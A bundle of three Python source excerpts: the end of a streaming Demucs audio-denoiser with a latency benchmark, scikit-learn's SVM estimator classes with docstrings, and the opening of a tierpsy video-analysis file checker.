            # remove extra samples after window
            frame = frame[:, :resample * self.frame_length]

            out, extra = self._separate_frame(frame)
            # `extra` only pads the right edge for better downsampling.
            padded_out = th.cat([self.resample_out, out, extra], 1)
            self.resample_out[:] = out[:, -resample_buffer:]
            if resample == 4:
                out = downsample2(downsample2(padded_out))
            elif resample == 2:
                out = downsample2(padded_out)
            else:
                out = padded_out

            out = out[:, resample_buffer // resample:]
            out = out[:, :stride]

            if demucs.normalize:
                # Undo the online normalization applied above.
                out *= math.sqrt(self.variance)
            # Mix in `dry` proportion of the unprocessed signal.
            out = self.dry * dry_signal + (1 - self.dry) * out
            outs.append(out)
            self.pending = self.pending[:, stride:]

        self.total_time += time.time() - begin
        if outs:
            out = th.cat(outs, 1)
        else:
            out = th.zeros(chin, 0, device=wav.device)
        return out

    def _separate_frame(self, frame):
        # Run one frame through the model, re-using cached activations
        # (self.conv_state / self.lstm_state) so only the new samples are
        # actually computed.
        demucs = self.demucs
        skips = []
        next_state = []
        first = self.conv_state is None
        stride = self.stride * demucs.resample
        x = frame[None]
        for idx, encode in enumerate(demucs.encoder):
            # Stride expressed at this layer's sample rate.
            stride //= demucs.stride
            length = x.shape[2]
            if idx == demucs.depth - 1:
                # This is slightly faster for the last conv
                x = fast_conv(encode[0], x)
                x = encode[1](x)
                x = fast_conv(encode[2], x)
                x = encode[3](x)
            else:
                if not first:
                    # Reuse cached outputs and only compute the positions
                    # not covered by the previous frame.
                    prev = self.conv_state.pop(0)
                    prev = prev[..., stride:]
                    tgt = (length - demucs.kernel_size) // demucs.stride + 1
                    missing = tgt - prev.shape[-1]
                    offset = length - demucs.kernel_size - \
                        demucs.stride * (missing - 1)
                    x = x[..., offset:]
                x = encode[1](encode[0](x))
                x = fast_conv(encode[2], x)
                x = encode[3](x)
                if not first:
                    x = th.cat([prev, x], -1)
                next_state.append(x)
            skips.append(x)

        x = x.permute(2, 0, 1)
        x, self.lstm_state = demucs.lstm(x, self.lstm_state)
        x = x.permute(1, 2, 0)
        # In the following, x contains only correct samples, i.e. the one
        # for which each time position is covered by two window of the upper
        # layer. extra contains extra samples to the right, and is used only as
        # a better padding for the online resampling.
        extra = None
        for idx, decode in enumerate(demucs.decoder):
            skip = skips.pop(-1)
            x += skip[..., :x.shape[-1]]
            x = fast_conv(decode[0], x)
            x = decode[1](x)

            if extra is not None:
                skip = skip[..., x.shape[-1]:]
                extra += skip[..., :extra.shape[-1]]
                extra = decode[2](decode[1](decode[0](extra)))
            x = decode[2](x)
            # Cache the right edge (minus the transposed-conv bias, which
            # would otherwise be double counted when overlapping frames).
            next_state.append(
                x[..., -demucs.stride:] - decode[2].bias.view(-1, 1)
            )
            if extra is None:
                extra = x[..., -demucs.stride:]
            else:
                extra[..., :demucs.stride] += next_state[-1]
            x = x[..., :-demucs.stride]

            if not first:
                # Overlap-add with the cached edge from the previous frame.
                prev = self.conv_state.pop(0)
                x[..., :demucs.stride] += prev
            if idx != demucs.depth - 1:
                x = decode[3](x)
                extra = decode[3](extra)
        self.conv_state = next_state
        return x[0], extra[0]
def test():
    """Benchmark the streaming Demucs against the offline model.

    Builds a model from command-line flags, runs 4 seconds of random audio
    both offline and through `DemucsStreamer`, and prints size, delta,
    latency and real-time-factor statistics.
    """
    import argparse
    parser = argparse.ArgumentParser(
        "denoiser.demucs",
        description="Benchmark the streaming Demucs implementation, as well as "
        "checking the delta with the offline implementation.")
    parser.add_argument("--depth", default=5, type=int)
    parser.add_argument("--resample", default=4, type=int)
    parser.add_argument("--hidden", default=48, type=int)
    parser.add_argument("--sample_rate", default=16000, type=float)
    parser.add_argument("--device", default="cpu")
    parser.add_argument("-t", "--num_threads", type=int)
    parser.add_argument("-f", "--num_frames", type=int, default=1)
    args = parser.parse_args()
    if args.num_threads:
        th.set_num_threads(args.num_threads)

    sr = args.sample_rate
    sr_ms = sr / 1000
    demucs = Demucs(
        depth=args.depth, hidden=args.hidden, resample=args.resample
    ).to(args.device)
    x = th.randn(1, int(sr * 4)).to(args.device)

    # Offline reference output.
    out = demucs(x[None])[0]

    # Streaming output: first chunk is the full initial window, then one
    # model stride at a time.
    streamer = DemucsStreamer(demucs, num_frames=args.num_frames)
    chunks = []
    chunk_size = streamer.total_length
    with th.no_grad():
        while x.shape[1] > 0:
            chunks.append(streamer.feed(x[:, :chunk_size]))
            x = x[:, chunk_size:]
            chunk_size = streamer.demucs.total_stride
        chunks.append(streamer.flush())
    out_rt = th.cat(chunks, 1)

    model_size = sum(p.numel() for p in demucs.parameters()) * 4 / 2**20
    initial_lag = streamer.total_length / sr_ms
    tpf = 1000 * streamer.time_per_frame
    rtf = (1000 * streamer.time_per_frame) / (streamer.stride / sr_ms)
    print(f"model size: {model_size:.1f}MB, ", end='')
    print(f"delta batch/streaming: {th.norm(out - out_rt) / th.norm(out):.2%}")
    print(f"initial lag: {initial_lag:.1f}ms, ", end='')
    # NOTE(review): streamer.stride already includes num_frames
    # (DemucsStreamer sets stride = total_stride * num_frames), so the
    # extra `* args.num_frames` below looks double-counted — confirm.
    print(f"stride: {streamer.stride * args.num_frames / sr_ms:.1f}ms")
    print(f"time per frame: {tpf:.1f}ms, ", end='')
    print(f"RTF: {rtf:.2f}")
    print(f"Total lag with computation: {initial_lag + tpf:.1f}ms")
| |
from .base import BaseLibLinear, BaseSVC, BaseLibSVM
from ..base import RegressorMixin
from ..linear_model.base import LinearClassifierMixin
from ..feature_selection.selector_mixin import SelectorMixin
class LinearSVC(BaseLibLinear, LinearClassifierMixin, SelectorMixin):
    """Linear Support Vector Classification.

    Similar to SVC with parameter kernel='linear', but implemented in terms of
    liblinear rather than libsvm, so it has more flexibility in the choice of
    penalties and loss functions and should scale better (to large numbers of
    samples).

    This class supports both dense and sparse input and the multiclass support
    is handled according to a one-vs-the-rest scheme.

    Parameters
    ----------
    C : float, optional (default=1.0)
        Penalty parameter C of the error term.

    loss : string, 'l1' or 'l2' (default='l2')
        Specifies the loss function. 'l1' is the hinge loss (standard SVM)
        while 'l2' is the squared hinge loss.

    penalty : string, 'l1' or 'l2' (default='l2')
        Specifies the norm used in the penalization. The 'l2'
        penalty is the standard used in SVC. The 'l1' leads to `coef_`
        vectors that are sparse.

    dual : bool, (default=True)
        Select the algorithm to either solve the dual or primal
        optimization problem. Prefer dual=False when n_samples > n_features.

    tol : float, optional (default=1e-4)
        Tolerance for stopping criteria

    multi_class: string, 'ovr' or 'crammer_singer' (default='ovr')
        Determines the multi-class strategy if `y` contains more than
        two classes.
        `ovr` trains n_classes one-vs-rest classifiers, while `crammer_singer`
        optimizes a joint objective over all classes.
        While `crammer_singer` is interesting from a theoretical perspective
        as it is consistent it is seldom used in practice and rarely leads to
        better accuracy and is more expensive to compute.
        If `crammer_singer` is chosen, the options loss, penalty and dual will
        be ignored.

    fit_intercept : boolean, optional (default=True)
        Whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    intercept_scaling : float, optional (default=1)
        when self.fit_intercept is True, instance vector x becomes
        [x, self.intercept_scaling],
        i.e. a "synthetic" feature with constant value equals to
        intercept_scaling is appended to the instance vector.
        The intercept becomes intercept_scaling * synthetic feature weight
        Note! the synthetic feature weight is subject to l1/l2 regularization
        as all other features.
        To lessen the effect of regularization on synthetic feature weight
        (and therefore on the intercept) intercept_scaling has to be increased

    class_weight : {dict, 'auto'}, optional
        Set the parameter C of class i to class_weight[i]*C for
        SVC. If not given, all classes are supposed to have
        weight one. The 'auto' mode uses the values of y to
        automatically adjust weights inversely proportional to
        class frequencies.

    verbose : int, default: 0
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in liblinear that, if enabled, may not work
        properly in a multithreaded context.

    Attributes
    ----------
    `coef_` : array, shape = [n_features] if n_classes == 2 \
            else [n_classes, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.

        `coef_` is readonly property derived from `raw_coef_` that \
        follows the internal memory layout of liblinear.

    `intercept_` : array, shape = [1] if n_classes == 2 else [n_classes]
        Constants in decision function.

    Notes
    -----
    The underlying C implementation uses a random number generator to
    select features when fitting the model. It is thus not uncommon,
    to have slightly different results for the same input data. If
    that happens, try with a smaller tol parameter.

    The underlying implementation (liblinear) uses a sparse internal
    representation for the data that will incur a memory copy.

    **References:**
    `LIBLINEAR: A Library for Large Linear Classification
    <http://www.csie.ntu.edu.tw/~cjlin/liblinear/>`__

    See also
    --------
    SVC
        Implementation of Support Vector Machine classifier using libsvm:
        the kernel can be non-linear but its SMO algorithm does not
        scale to large number of samples as LinearSVC does.
        Furthermore SVC multi-class mode is implemented using one
        vs one scheme while LinearSVC uses one vs the rest. It is
        possible to implement one vs the rest with SVC by using the
        :class:`sklearn.multiclass.OneVsRestClassifier` wrapper.
        Finally SVC can fit dense data without memory copy if the input
        is C-contiguous. Sparse data will still incur memory copy though.

    sklearn.linear_model.SGDClassifier
        SGDClassifier can optimize the same cost function as LinearSVC
        by adjusting the penalty and loss parameters. Furthermore
        SGDClassifier is scalable to large number of samples as it uses
        a Stochastic Gradient Descent optimizer.
        Finally SGDClassifier can fit both dense and sparse data without
        memory copy if the input is C-contiguous or CSR.

    """
    # all the implementation is provided by the mixins
    pass
class SVC(BaseSVC):
    """C-Support Vector Classification.

    The implementation is based on libsvm. The fit time complexity
    is more than quadratic with the number of samples which makes it hard
    to scale to dataset with more than a couple of 10000 samples.

    The multiclass support is handled according to a one-vs-one scheme.

    For details on the precise mathematical formulation of the provided
    kernel functions and how `gamma`, `coef0` and `degree` affect each,
    see the corresponding section in the narrative documentation:
    :ref:`svm_kernels`.

    .. The narrative documentation is available at http://scikit-learn.org/

    Parameters
    ----------
    C : float, optional (default=1.0)
        Penalty parameter C of the error term.

    kernel : string, optional (default='rbf')
        Specifies the kernel type to be used in the algorithm.
        It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
        a callable.
        If none is given, 'rbf' will be used. If a callable is given it is
        used to precompute the kernel matrix.

    degree : int, optional (default=3)
        Degree of kernel function.
        It is significant only in 'poly' and 'sigmoid'.

    gamma : float, optional (default=0.0)
        Kernel coefficient for 'rbf' and 'poly'.
        If gamma is 0.0 then 1/n_features will be used instead.

    coef0 : float, optional (default=0.0)
        Independent term in kernel function.
        It is only significant in 'poly' and 'sigmoid'.

    probability: boolean, optional (default=False)
        Whether to enable probability estimates. This must be enabled prior
        to calling predict_proba.

    shrinking: boolean, optional (default=True)
        Whether to use the shrinking heuristic.

    tol : float, optional (default=1e-3)
        Tolerance for stopping criterion.

    cache_size : float, optional
        Specify the size of the kernel cache (in MB)

    class_weight : {dict, 'auto'}, optional
        Set the parameter C of class i to class_weight[i]*C for
        SVC. If not given, all classes are supposed to have
        weight one. The 'auto' mode uses the values of y to
        automatically adjust weights inversely proportional to
        class frequencies.

    verbose : bool, default: False
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in libsvm that, if enabled, may not work
        properly in a multithreaded context.

    max_iter : int, optional (default=-1)
        Hard limit on iterations within solver, or -1 for no limit.

    Attributes
    ----------
    `support_` : array-like, shape = [n_SV]
        Index of support vectors.

    `support_vectors_` : array-like, shape = [n_SV, n_features]
        Support vectors.

    `n_support_` : array-like, dtype=int32, shape = [n_class]
        number of support vector for each class.

    `dual_coef_` : array, shape = [n_class-1, n_SV]
        Coefficients of the support vector in the decision function. \
        For multiclass, coefficient for all 1-vs-1 classifiers. \
        The layout of the coefficients in the multiclass case is somewhat \
        non-trivial. See the section about multi-class classification in the \
        SVM section of the User Guide for details.

    `coef_` : array, shape = [n_class-1, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.

        `coef_` is readonly property derived from `dual_coef_` and
        `support_vectors_`

    `intercept_` : array, shape = [n_class * (n_class-1) / 2]
        Constants in decision function.

    Examples
    --------
    >>> import numpy as np
    >>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
    >>> y = np.array([1, 1, 2, 2])
    >>> from sklearn.svm import SVC
    >>> clf = SVC()
    >>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
    SVC(C=1.0, cache_size=200, class_weight=None, coef0=0.0, degree=3,
        gamma=0.0, kernel='rbf', max_iter=-1, probability=False,
        shrinking=True, tol=0.001, verbose=False)
    >>> print(clf.predict([[-0.8, -1]]))
    [ 1.]

    See also
    --------
    SVR
        Support Vector Machine for Regression implemented using libsvm.

    LinearSVC
        Scalable Linear Support Vector Machine for classification
        implemented using liblinear. Check the See also section of
        LinearSVC for more comparison element.

    """

    def __init__(self, C=1.0, kernel='rbf', degree=3, gamma=0.0,
                 coef0=0.0, shrinking=True, probability=False,
                 tol=1e-3, cache_size=200, class_weight=None,
                 verbose=False, max_iter=-1):
        # Positional arguments follow the BaseSVC/BaseLibSVM parameter
        # order; the literal 0., 0. and "auto" values presumably fill
        # slots (nu/epsilon/...) unused by the 'c_svc' implementation —
        # verify against BaseLibSVM.__init__ before touching.
        super(SVC, self).__init__(
            'c_svc', kernel, degree, gamma, coef0, tol, C, 0., 0., shrinking,
            probability, cache_size, "auto", class_weight, verbose, max_iter)
class NuSVC(BaseSVC):
    """Nu-Support Vector Classification.
    Similar to SVC but uses a parameter to control the number of support
    vectors.
    The implementation is based on libsvm.
    Parameters
    ----------
    nu : float, optional (default=0.5)
        An upper bound on the fraction of training errors and a lower
        bound of the fraction of support vectors. Should be in the
        interval (0, 1].
    kernel : string, optional (default='rbf')
        Specifies the kernel type to be used in the algorithm.
        It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
        a callable.
        If none is given, 'rbf' will be used. If a callable is given it is
        used to precompute the kernel matrix.
    degree : int, optional (default=3)
        degree of kernel function
        is significant only in poly, rbf, sigmoid
    gamma : float, optional (default=0.0)
        kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
        will be taken.
    coef0 : float, optional (default=0.0)
        independent term in kernel function. It is only significant
        in poly/sigmoid.
    probability: boolean, optional (default=False)
        Whether to enable probability estimates. This must be enabled prior
        to calling predict_proba.
    shrinking: boolean, optional (default=True)
        Whether to use the shrinking heuristic.
    tol : float, optional (default=1e-3)
        Tolerance for stopping criterion.
    cache_size : float, optional
        Specify the size of the kernel cache (in MB)
    verbose : bool, default: False
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in libsvm that, if enabled, may not work
        properly in a multithreaded context.
    max_iter : int, optional (default=-1)
        Hard limit on iterations within solver, or -1 for no limit.
    Attributes
    ----------
    `support_` : array-like, shape = [n_SV]
        Index of support vectors.
    `support_vectors_` : array-like, shape = [n_SV, n_features]
        Support vectors.
    `n_support_` : array-like, dtype=int32, shape = [n_class]
        number of support vector for each class.
    `dual_coef_` : array, shape = [n_class-1, n_SV]
        Coefficients of the support vector in the decision function. \
        For multiclass, coefficient for all 1-vs-1 classifiers. \
        The layout of the coefficients in the multiclass case is somewhat \
        non-trivial. See the section about multi-class classification in \
        the SVM section of the User Guide for details.
    `coef_` : array, shape = [n_class-1, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.
        `coef_` is readonly property derived from `dual_coef_` and
        `support_vectors_`
    `intercept_` : array, shape = [n_class * (n_class-1) / 2]
        Constants in decision function.
    Examples
    --------
    >>> import numpy as np
    >>> X = np.array([[-1, -1], [-2, -1], [1, 1], [2, 1]])
    >>> y = np.array([1, 1, 2, 2])
    >>> from sklearn.svm import NuSVC
    >>> clf = NuSVC()
    >>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
    NuSVC(cache_size=200, coef0=0.0, degree=3, gamma=0.0, kernel='rbf',
       max_iter=-1, nu=0.5, probability=False, shrinking=True, tol=0.001,
       verbose=False)
    >>> print(clf.predict([[-0.8, -1]]))
    [ 1.]
    See also
    --------
    SVC
        Support Vector Machine for classification using libsvm.
    LinearSVC
        Scalable linear Support Vector Machine for classification using
        liblinear.
    """
    def __init__(self, nu=0.5, kernel='rbf', degree=3, gamma=0.0,
                 coef0=0.0, shrinking=True, probability=False,
                 tol=1e-3, cache_size=200, verbose=False, max_iter=-1):
        # 'nu_svc' selects the nu-parameterised classifier.  The scalar
        # slots after tol are (C, nu, epsilon); C and epsilon are unused.
        # class_weight is fixed to None: NuSVC does not expose it.
        super(NuSVC, self).__init__(
            'nu_svc', kernel, degree, gamma, coef0, tol, 0., nu, 0., shrinking,
            probability, cache_size, "auto", None, verbose, max_iter)
class SVR(BaseLibSVM, RegressorMixin):
    """epsilon-Support Vector Regression.
    The free parameters in the model are C and epsilon.
    The implementation is based on libsvm.
    Parameters
    ----------
    C : float, optional (default=1.0)
        penalty parameter C of the error term.
    epsilon : float, optional (default=0.1)
        epsilon in the epsilon-SVR model. It specifies the epsilon-tube
        within which no penalty is associated in the training loss function
        with points predicted within a distance epsilon from the actual
        value.
    kernel : string, optional (default='rbf')
        Specifies the kernel type to be used in the algorithm.
        It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
        a callable.
        If none is given, 'rbf' will be used. If a callable is given it is
        used to precompute the kernel matrix.
    degree : int, optional (default=3)
        degree of kernel function
        is significant only in poly, rbf, sigmoid
    gamma : float, optional (default=0.0)
        kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
        will be taken.
    coef0 : float, optional (default=0.0)
        independent term in kernel function. It is only significant
        in poly/sigmoid.
    probability: boolean, optional (default=False)
        Whether to enable probability estimates. This must be enabled prior
        to calling predict_proba.
    shrinking: boolean, optional (default=True)
        Whether to use the shrinking heuristic.
    tol : float, optional (default=1e-3)
        Tolerance for stopping criterion.
    cache_size : float, optional
        Specify the size of the kernel cache (in MB)
    verbose : bool, default: False
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in libsvm that, if enabled, may not work
        properly in a multithreaded context.
    max_iter : int, optional (default=-1)
        Hard limit on iterations within solver, or -1 for no limit.
    Attributes
    ----------
    `support_` : array-like, shape = [n_SV]
        Index of support vectors.
    `support_vectors_` : array-like, shape = [nSV, n_features]
        Support vectors.
    `dual_coef_` : array, shape = [n_classes-1, n_SV]
        Coefficients of the support vector in the decision function.
    `coef_` : array, shape = [n_classes-1, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.
        `coef_` is readonly property derived from `dual_coef_` and
        `support_vectors_`
    `intercept_` : array, shape = [n_class * (n_class-1) / 2]
        Constants in decision function.
    Examples
    --------
    >>> from sklearn.svm import SVR
    >>> import numpy as np
    >>> n_samples, n_features = 10, 5
    >>> np.random.seed(0)
    >>> y = np.random.randn(n_samples)
    >>> X = np.random.randn(n_samples, n_features)
    >>> clf = SVR(C=1.0, epsilon=0.2)
    >>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
    SVR(C=1.0, cache_size=200, coef0=0.0, degree=3, epsilon=0.2, gamma=0.0,
       kernel='rbf', max_iter=-1, probability=False, shrinking=True, tol=0.001,
       verbose=False)
    See also
    --------
    NuSVR
        Support Vector Machine for regression implemented using libsvm
        using a parameter to control the number of support vectors.
    """
    def __init__(self, kernel='rbf', degree=3, gamma=0.0, coef0=0.0, tol=1e-3,
                 C=1.0, epsilon=0.1, shrinking=True, probability=False,
                 cache_size=200, verbose=False, max_iter=-1):
        # 'epsilon_svr' selects epsilon-SVR.  The scalar slots after tol are
        # (C, nu, epsilon); nu is unused here, and class_weight is always
        # None for regression.
        super(SVR, self).__init__(
            'epsilon_svr', kernel, degree, gamma, coef0, tol, C, 0., epsilon,
            shrinking, probability, cache_size, "auto", None, verbose,
            max_iter)
class NuSVR(BaseLibSVM, RegressorMixin):
    """Nu Support Vector Regression.
    Similar to NuSVC, for regression, uses a parameter nu to control
    the number of support vectors. However, unlike NuSVC, where nu
    replaces C, here nu replaces the parameter epsilon of SVR.
    The implementation is based on libsvm.
    Parameters
    ----------
    C : float, optional (default=1.0)
        penalty parameter C of the error term.
    nu : float, optional
        An upper bound on the fraction of training errors and a lower bound of
        the fraction of support vectors. Should be in the interval (0, 1]. By
        default 0.5 will be taken.
    kernel : string, optional (default='rbf')
        Specifies the kernel type to be used in the algorithm.
        It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
        a callable.
        If none is given, 'rbf' will be used. If a callable is given it is
        used to precompute the kernel matrix.
    degree : int, optional (default=3)
        degree of kernel function
        is significant only in poly, rbf, sigmoid
    gamma : float, optional (default=0.0)
        kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
        will be taken.
    coef0 : float, optional (default=0.0)
        independent term in kernel function. It is only significant
        in poly/sigmoid.
    probability: boolean, optional (default=False)
        Whether to enable probability estimates. This must be enabled prior
        to calling predict_proba.
    shrinking: boolean, optional (default=True)
        Whether to use the shrinking heuristic.
    tol : float, optional (default=1e-3)
        Tolerance for stopping criterion.
    cache_size : float, optional
        Specify the size of the kernel cache (in MB)
    verbose : bool, default: False
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in libsvm that, if enabled, may not work
        properly in a multithreaded context.
    max_iter : int, optional (default=-1)
        Hard limit on iterations within solver, or -1 for no limit.
    Attributes
    ----------
    `support_` : array-like, shape = [n_SV]
        Index of support vectors.
    `support_vectors_` : array-like, shape = [nSV, n_features]
        Support vectors.
    `dual_coef_` : array, shape = [n_classes-1, n_SV]
        Coefficients of the support vector in the decision function.
    `coef_` : array, shape = [n_classes-1, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.
        `coef_` is readonly property derived from `dual_coef_` and
        `support_vectors_`
    `intercept_` : array, shape = [n_class * (n_class-1) / 2]
        Constants in decision function.
    Examples
    --------
    >>> from sklearn.svm import NuSVR
    >>> import numpy as np
    >>> n_samples, n_features = 10, 5
    >>> np.random.seed(0)
    >>> y = np.random.randn(n_samples)
    >>> X = np.random.randn(n_samples, n_features)
    >>> clf = NuSVR(C=1.0, nu=0.1)
    >>> clf.fit(X, y) #doctest: +NORMALIZE_WHITESPACE
    NuSVR(C=1.0, cache_size=200, coef0=0.0, degree=3, gamma=0.0, kernel='rbf',
       max_iter=-1, nu=0.1, probability=False, shrinking=True, tol=0.001,
       verbose=False)
    See also
    --------
    NuSVC
        Support Vector Machine for classification implemented with libsvm
        with a parameter to control the number of support vectors.
    SVR
        epsilon Support Vector Machine for regression implemented with libsvm.
    """
    def __init__(self, nu=0.5, C=1.0, kernel='rbf', degree=3,
                 gamma=0.0, coef0=0.0, shrinking=True,
                 probability=False, tol=1e-3, cache_size=200,
                 verbose=False, max_iter=-1):
        # 'nu_svr' selects nu-SVR.  The scalar slots after tol are
        # (C, nu, epsilon); epsilon is unused because nu replaces it.
        super(NuSVR, self).__init__(
            'nu_svr', kernel, degree, gamma, coef0, tol, C, nu, 0., shrinking,
            probability, cache_size, "auto", None, verbose, max_iter)
class OneClassSVM(BaseLibSVM):
    """Unsupervised Outliers Detection.
    Estimate the support of a high-dimensional distribution.
    The implementation is based on libsvm.
    Parameters
    ----------
    kernel : string, optional (default='rbf')
        Specifies the kernel type to be used in the algorithm.
        It must be one of 'linear', 'poly', 'rbf', 'sigmoid', 'precomputed' or
        a callable.
        If none is given, 'rbf' will be used. If a callable is given it is
        used to precompute the kernel matrix.
    nu : float, optional
        An upper bound on the fraction of training
        errors and a lower bound of the fraction of support
        vectors. Should be in the interval (0, 1]. By default 0.5
        will be taken.
    degree : int, optional
        Degree of kernel function. Significant only in poly, rbf, sigmoid.
    gamma : float, optional (default=0.0)
        kernel coefficient for rbf and poly, if gamma is 0.0 then 1/n_features
        will be taken.
    coef0 : float, optional
        Independent term in kernel function. It is only significant in
        poly/sigmoid.
    tol : float, optional
        Tolerance for stopping criterion.
    shrinking: boolean, optional
        Whether to use the shrinking heuristic.
    cache_size : float, optional
        Specify the size of the kernel cache (in MB)
    verbose : bool, default: False
        Enable verbose output. Note that this setting takes advantage of a
        per-process runtime setting in libsvm that, if enabled, may not work
        properly in a multithreaded context.
    max_iter : int, optional (default=-1)
        Hard limit on iterations within solver, or -1 for no limit.
    Attributes
    ----------
    `support_` : array-like, shape = [n_SV]
        Index of support vectors.
    `support_vectors_` : array-like, shape = [nSV, n_features]
        Support vectors.
    `dual_coef_` : array, shape = [n_classes-1, n_SV]
        Coefficient of the support vector in the decision function.
    `coef_` : array, shape = [n_classes-1, n_features]
        Weights assigned to the features (coefficients in the primal
        problem). This is only available in the case of linear kernel.
        `coef_` is readonly property derived from `dual_coef_` and
        `support_vectors_`
    `intercept_` : array, shape = [n_classes-1]
        Constants in decision function.
    """
    def __init__(self, kernel='rbf', degree=3, gamma=0.0, coef0=0.0, tol=1e-3,
                 nu=0.5, shrinking=True, cache_size=200, verbose=False,
                 max_iter=-1):
        # 'one_class' selects one-class SVM; the C and epsilon slots are
        # unused and probability estimates are not supported (hard-coded
        # False).  class_weight is always None.
        super(OneClassSVM, self).__init__(
            'one_class', kernel, degree, gamma, coef0, tol, 0., nu, 0.,
            shrinking, False, cache_size, "auto", None, verbose, max_iter)
    def fit(self, X, sample_weight=None, **params):
        """
        Detects the soft boundary of the set of samples X.
        Parameters
        ----------
        X : {array-like, sparse matrix}, shape = [n_samples, n_features]
            Set of samples, where n_samples is the number of samples and
            n_features is the number of features.
        sample_weight : array-like, shape = [n_samples], optional
            Per-sample weights forwarded to BaseLibSVM.fit.
        **params : dict
            Extra fit parameters forwarded to BaseLibSVM.fit.
        Returns
        -------
        self : object
            Returns self.
        Notes
        -----
        If X is not a C-ordered contiguous array it is copied.
        """
        # One-class estimation is unsupervised: pass an empty label list.
        super(OneClassSVM, self).fit(X, [], sample_weight=sample_weight,
                                     **params)
        return self
| |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 9 15:12:48 2015
@author: ajaver
"""
import multiprocessing as mp
import os
from functools import partial
from tierpsy.helper.misc import TimeCounter
from tierpsy.processing.AnalysisPoints import AnalysisPoints, init_analysis_point_lock
from tierpsy.processing.ProcessLocal import BATCH_SCRIPT_LOCAL
from tierpsy.processing.helper import create_script
from tierpsy.processing.run_multi_cmd import print_cmd_list
BREAK_L = '*********************************************'
class CheckFilesForProcessing(object):
    """Classify video files by their analysis progress and build the batch
    commands required to process (or finish processing) each of them.

    After `filterFiles` runs, `self.filtered_files` maps a status label to a
    list of (AnalysisPoints, unfinished_points) tuples:
      'SOURCE_GOOD'   - valid files with no analysis done yet.
      'FINISHED_BAD'  - files whose analysis is only partially done.
      'SOURCE_BAD'    - files whose next analysis step has unmet requirements.
      'FINISHED_GOOD' - files where every requested checkpoint is finished.
    """
    def __init__(self, video_dir_root, mask_dir_root,
                 results_dir_root, tmp_dir_root='',
                 json_file='', analysis_checkpoints=None,
                 is_copy_video=True,
                 copy_unfinished=True,
                 is_parallel_check=True):
        '''All *_root arguments are made absolute. video_dir_root and
        json_file must exist; the output roots are created if missing.'''
        def _testFileExists(fname, type_str):
            # Resolve to an absolute path and fail early when missing.
            if fname:
                fname = os.path.abspath(fname)
                if not os.path.exists(fname):
                    raise FileNotFoundError('%s does not exist.' % fname)
            return fname
        def _makeDirIfNotExists(fname):
            # Resolve to an absolute path, creating the directory if needed.
            if fname:
                fname = os.path.abspath(fname)
                if not os.path.exists(fname):
                    os.makedirs(fname)
            return fname
        # checks before accepting the data
        self.video_dir_root = _testFileExists(video_dir_root, 'Videos root directory')
        self.mask_dir_root = _makeDirIfNotExists(mask_dir_root)
        self.results_dir_root = _makeDirIfNotExists(results_dir_root)
        self.json_file = _testFileExists(json_file, 'Parameters json file')
        self.tmp_dir_root = _makeDirIfNotExists(tmp_dir_root)
        self.is_copy_video = is_copy_video
        self.copy_unfinished = copy_unfinished
        # BUGFIX: was a mutable default argument ([]).  The public behaviour
        # is unchanged: omitting the argument still means "no checkpoints".
        self.analysis_checkpoints = [] if analysis_checkpoints is None else analysis_checkpoints
        self.filtered_files = {}
        self.is_parallel_check = is_parallel_check
    def _checkIndFile(self, video_file):
        '''Check the progress in the file.
        Returns (status_msg, AnalysisPoints, unfinished_points).'''
        video_dir, video_file_name = os.path.split(video_file)
        subdir_path = self._getSubDirPath(video_dir, self.video_dir_root)
        mask_dir = os.path.join(self.mask_dir_root, subdir_path)
        results_dir = os.path.join(self.results_dir_root, subdir_path)
        ap_obj = AnalysisPoints(video_file, mask_dir, results_dir, self.json_file)
        unfinished_points = ap_obj.getUnfinishedPoints(self.analysis_checkpoints)
        if len(unfinished_points) == 0:
            # every requested checkpoint is already done
            msg = 'FINISHED_GOOD'
        else:
            unmet_requirements = ap_obj.hasRequirements(unfinished_points[0])
            if len(unmet_requirements) > 0:
                # the first pending step cannot run: missing/bad source data
                msg = 'SOURCE_BAD'
            elif unfinished_points != self.analysis_checkpoints:
                # some, but not all, checkpoints are done
                msg = 'FINISHED_BAD'
            else:
                msg = 'SOURCE_GOOD'
        return msg, ap_obj, unfinished_points
    def _getSubDirPath(self, source_dir, source_root_dir):
        '''Generate the destination dir path keeping the same structure
        as the source directory'''
        #if the source_root_dir is empty do not create a subdir_path
        if not source_root_dir:
            return ''
        subdir_path = source_dir.replace(source_root_dir, '')
        #TODO: what happens if there is a MaskedVideos dir within the subdirectory?
        # consider the case the subdirectory is only a directory separation
        # character
        if subdir_path and subdir_path[0] == os.sep:
            subdir_path = subdir_path[1:] if len(subdir_path) > 1 else ''
        return subdir_path
    @property
    def summary_msg(self):
        '''Human-readable summary of the last filterFiles() run.'''
        msg_pairs = [
            ('SOURCE_GOOD', 'Unprocessed files.'),
            ('FINISHED_BAD', 'Files whose analysis is incompleted.'),
            ('SOURCE_BAD', 'Invalid source files.'),
            ('FINISHED_GOOD', 'Files that were successfully finished.')
        ]
        def _vals2str(val, msg):
            return '{}\t{}'.format(val, msg)
        msd_dat = [_vals2str(len(self.filtered_files[key]), msg) for key, msg in msg_pairs]
